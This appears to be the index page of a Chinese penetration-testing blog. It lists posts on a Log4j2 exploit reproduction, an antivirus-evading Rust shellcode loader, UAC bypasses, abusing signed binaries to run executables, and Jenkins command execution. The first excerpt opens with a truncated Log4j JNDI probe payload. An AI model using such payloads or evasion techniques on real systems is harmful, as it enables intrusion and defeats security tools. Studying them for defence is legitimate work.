前言最近很火的漏洞,前几天第一时间复现了,今天发文章记录一下.[aru_13]探测payload:${jndi:ldap://d... 渗透测试|迟来的Log4j2命令执行简单复现 4年前 (2021-12-15) 9,961 3
说明在一次Jenkins的后台中,执行命令遇到的一个坑.正常命令执行回显尝试正常命令创建文件夹执行后查看... 渗透测试|Jenkins后台脚本控制台命令执行小坑 4年前 (2021-11-25) 6,987 1
前言在git上找了一个rust的加载器,简单的改了改,直接免杀,不知道能存活多久.编译后大小:1.67mb原项目地... 渗透测试|[rust]shellcode免杀加载器【vt查杀1/67】 4年前 (2021-11-09) 33,705 82
前言最近在学c#,后端用go写接口,想到一个问题,如何抵挡如burp等工具的重放请求包,网上思路也挺多,在这里... 渗透测试|开发过程中关于重放攻击的防御方法 4年前 (2021-10-29) 5,047 0
前言今早起来在公众号上看到一个文章,workfolders命令会执行当前目录下的control.exe文件。workfolders... 渗透测试|win10下利用白进程执行exe的一种方式 4年前 (2021-10-22) 5,637 0
说明提供golang版本和c++版本,优劣势说明:c++版本能过360,过不了defender,不过体积较小.[aru_17]golang... 渗透测试|Win10系统BypassUac某60,defender 4年前 (2021-10-18) 5,550 0
前言作为一个菜鸡,抱着学习的态度来试着打打了这次的陇剑杯,结果只拿到300多名(丢脸[aru_21]),所谓重... CTF|一个菜鸡的一次陇剑杯之旅(基础题wp) 4年前 (2021-09-14) 8,184 1
前言早在几年前就有很多apt组织利用everything来进行文件查找等,前几年在T00ls上也有人发过相关的文章[... 渗透测试|Everything在取证收集方面的利用 4年前 (2021-09-01) 7,149 3
前言最近在玩永劫无间,闲得无聊就翻翻文件目录,然后翻到一个好东西[aru_3],如下图一看还带有官方签名... 渗透测试|一个具有永劫无间官方签名可执行任意文件的白进程 4年前 (2021-07-31) 5,481 0
说明在一个大哥的需求下,临时搞了一个批量url存活扫描工具,可检测url以及对应标题。目前还有个bug,编... Golang|一个简单的多线程批量url存活扫描工具 4年前 (2021-06-11) 5,807 0
说明第一次用golang上手写目录扫描器,原理很简单,就不多说了。[aru_5](本来最开始写了自动保存扫描结... 渗透测试|Dirscan|一个简单的web目录扫描器 4年前 (2021-05-04) 7,742 2